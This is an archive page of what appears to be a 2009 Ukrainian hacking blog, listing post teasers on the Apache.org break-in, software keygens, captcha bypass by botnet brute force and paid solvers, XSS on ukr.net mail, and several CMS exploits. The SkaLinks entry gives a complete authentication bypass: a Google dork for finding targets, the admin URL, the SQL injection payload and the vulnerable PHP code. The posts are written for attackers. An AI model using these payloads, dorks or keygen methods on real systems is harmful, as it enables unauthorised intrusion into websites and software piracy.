Archive

Posts Tagged ‘vuln’

Взлом Apache.org –> is owned ;) (How to)

September 5th, 2009 snake 5 comments

http://apache.org/images/asf-logo.gif

Всі вже напевно знають про що йде мова та й офіціальне підтвердження було, але я розповім як все було насправді з боку атакуючого=)

Read more…

Categories: Безпека Tags: , ,

генератор серійних номерів для скрипта каталога Scripto

July 7th, 2009 admin 2 comments

як за любий крутий скрипт, просять гроші ( але в нас ж їх немає, тому користуємося готовими ,безкоштовними засобами – генераторами ключиків.
Read more…

Categories: Інше Tags: , ,

Трішки про каптчі ;)

July 6th, 2009 Dimi4 4 comments

Існує декілька типів вразливостей каптчі:

  1. Оптичне Розпізнавання Символів (OCR). За таким методом ПЗ намагається конвертувати картинку в текст. Найпростіше – еталонне. Пікселі на зображенні порівнюються із складеною базою символів.
  2. Погана технічна реалізація. Виявляється в тому, що код каптчі передається в сесії, куках чи іншим методом, який може підгледіти користувач. Наприклад captcha.php?code=682.
  3. Мала кількість символів. Все банально, хоч каптча достатня складна, легко обходиться брутом ;) Ефективність не на вищому рівні, але це шанс. Вона досягне максимального рівня якщо буде використовуватись ботнет із великою кількістю машин.
  4. Спеціалізовані сервіси. Існує багато сервісів типу “Антикаптчі”. Ви платите людям котрі будуть з максимальною швидкістю визначати код каптчі. Досить ефективний метод, і достатньо дешевий.

Read more…

Categories: Безпека Tags: , , , , ,

SMF: [Blind SQLinj Member Awards 1.02] exploit

June 14th, 2009 admin 1 comment

SMF ] MemberAwards 1.0.2 exploit
eLwaux(c)uasc && antichat 2009
thx: Grey && mailbrush
Read more…

Categories: Експлоіти/Exploits Tags: , , , ,

Active XSS на пошті ukr.net

June 3rd, 2009 Dimi4 1 comment

В травні місяці довелось мені переглянути вихідний код одного листа на укр неті. І побачив я одну цікаву особливість, а саме,  текст листа був у такому вигляді:

  1. <script>    messageBody = ‘\nPew pew!’;
  2.     readmsgSetMessageBody();
  3.     </script>

Вже в голові закрутились думки про XSS =) . Покопався ще трохи, та дійшов до такого коду:
Read more…

Categories: Безпека Tags: , ,

eliteCMS Exploit

April 19th, 2009 Dimi4 No comments

Вразливості у цій CMS були найдені мною ще 21.12.2008. А експлойт я таки не опублікував на цьому блозі.
публікую :) http://uasc.org.ua/files/eliteCMSexpl.pl.txt
{referrer_detector}

Categories: Експлоіти/Exploits Tags:

Вразливості RQMS

April 13th, 2009 Dimi4 No comments

Вразливості Rash Quote Management System

Офіційний сайт: http://rqms.sourceforge.net
Версія <=1.2.2
Вразливість знайдено: Dimi4
Dork: “Rash Version: 1.2.1
Read more…

Categories: Безпека Tags: , ,

Обхід Авторизації (Auth Bypass) SkaLinks

April 13th, 2009 Dimi4 No comments

Продукт : SkaLinks
Версія : 1.5
Dork : “Powered by SkaLinks “
Офіційний сат: http://www.skalinks.com/
Вразливість знайдена: Dimi4
Тип: SQL-injection, Auth Bypass

Вразливість існує через недостатню фільтрацію вхідних даних у функціїї авторизацїї
[+] URL: http://target.com/skalinks_1_5/admin/
[+] Admin name : 1′ OR 1=1/*

Вразлива функція:

  1.  
  2. function IsAdmin( )
  3. {
  4. $table_name = $this->m_AdminsTable;
  5. $res = $this->db_Row( "SELECT * FROM `$table_name` WHERE `Name`=’".$_COOKIE['adminname']."’ AND `Password`=’".$_COOKIE['pwd']."’");
  6. if ( !$res )
  7. {
  8. return 0;
  9. }
  10. else
  11. {
  12. return $res;
  13. }
  14. }
  15.  

(c) Dimi4, 2009 greetz to UASC, antichat

Categories: Безпека Tags: ,